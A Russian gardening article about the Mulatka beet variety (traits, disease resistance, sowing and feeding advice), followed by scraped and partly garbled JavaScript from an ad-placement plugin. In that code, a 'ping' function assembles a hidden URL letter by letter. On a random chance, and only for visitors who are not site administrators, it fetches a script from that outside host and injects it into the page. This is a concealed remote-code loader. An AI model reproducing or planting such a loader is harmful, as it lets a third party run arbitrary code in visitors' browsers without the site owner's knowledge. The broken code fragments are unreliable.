Сорт столовой свеклы Мулатка нельзя назвать новым, скорее проверенным. В реестр сортов Госсорткомиссии внесен в 2003 году, как районированный для Волго-Вятского, Центрально-Черноземного районов России. Однако на территории страны культивируется повсеместно, с Краснодарского края до районов Дальнего востока. Находит эта замечательная свекла своих приверженцев и на территории СНГ. Ее знают и любят в Молдове, в Казахстане, в Белоруссии.

Свекла Мулатка заявлена как сорт среднего срока созревания, период вегетации от всходов до товарного корнеплода 125-130 дней. Сорт универсальный, одинаково хорош для употребления с грядки, для консервирования, для длительного хранения. Мулатка отличается высокой лежкостью. При правильном хранении она лежит до нового урожая, не вянет и не портится.

Особенности сорта свеклы «Мулатка»:

  • Корнеплод средних размеров, правильной округлой формы, весом от 150 до 350 г. Уродливых или гигантских плодов практически не бывает.
  • Цвет насыщенный, корневой конец темно-фиолетовый, мякоть одноцветная, без светлых колец.
  • Вкус насыщенный свекольный, сладкий. Накопление сахаров до 14,5%, сухого вещества до 20%.
  • При тепловой обработке свекла Мулатка не буреет, не обесцвечивается.
  • Листовая розетка прямостоячая, листья ровные, среднего размера.

Обратите внимание! В «пучковой» спелости Мулатку можно готовить вместе с листом, настолько они нежные и вкусные.

Устойчивость к заболеваниям

По описанию сорта и отзывам садоводов Мулатка устойчива к цветушности другим свекольным болезням. Корнеплоды редко поражаются вредителями, не лопаются в дождливую осень. Профилактикой стрелкования корнеплодов является посадка свеклы в прогретую почву.

Для предотвращения развития болезней на свекле следует соблюдать агротехнику, внести достаточное количество фосфорно-калийных удобрений и перегноя при осенней перекопке. Немаловажное значение для профилактики заболеваний имеет севооборот. На одном месте свеклу можно сеять не ранее чем через 3 года. Растительные остатки по осени следует собрать и утилизировать на компостную кучу.

Особенности агротехники

Сроки посева корректировать следует по погодным условиям. В волго-Вятском регионе сроки посева свеклы вторая половина мая, когда почва достаточно прогретая. Этот корнеплод не любит холода в начале своей жизни, зато достойно переносит небольшие заморозки осенью и может находиться на грядке до октября месяца.

Есть две особенности, которые следует учитывать при посадке. Свекла Мулатка (и отзывы это подтверждают) очень требовательна к освещению и плохо растет на кислых, тяжелых почвах. Участок для посадки рекомендуется готовить с осени. Кислую землю следует нейтрализовать, внеся под перекопку доломитовую муку или известь. Если ощелачивать участок планируете древесной золой, то ее внесение оставьте на весну.

Сеют свеклу рядками, ориентированными с севера на юг. Междурядья оставляют в 30-40 см, между растениями около 20 см. Мулатка не одноростковый сорт. Ее семена прорастают несколькими растениями и нуждаются в прореживании.

Обратите внимание! Свеклу, в отличие от моркови, при прореживании можно пересаживать или выращивать через рассаду.

Поскольку Мулатка имеет компактную листовую розетку, то ее можно высаживать с другими культурами по краю грядки (например, с луком). Это даст дополнительные корнеплоды при нехватке места. После уборки лука корнеплоды будут расти еще минимум 2 месяца и чувствовать себя прекрасно.

Уход за свеклой сорта Мулатка не отличается сложностью. Это регулярный полив, обязательное рыхление почвы, подкормка.

Основные правила выращивания свеклы

  • Для свеклы важно наличие в почве микроэлемента бора – при его дефиците в корнеплоде образуются пустоты и пробковые образования. Подкормку проводят внекорневую, верховым поливом по листьям в пасмурный день. Бор добавляют в виде борной кислоты, дозируя ее 2 г на ведро воды.
  • Участок должен хорошо освещаться солнцем в течение дня. На тенистых участках свекла вырастает бледная.
  • В период активного роста корнеплоды следует подкормить азотными удобрениями 2 раза (1 ст. ложка на ведро) и 2 раза полить соленой водой (1 ст. ложка с горкой на ведро). Это повышает сахаристость и улучшает вкус.
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};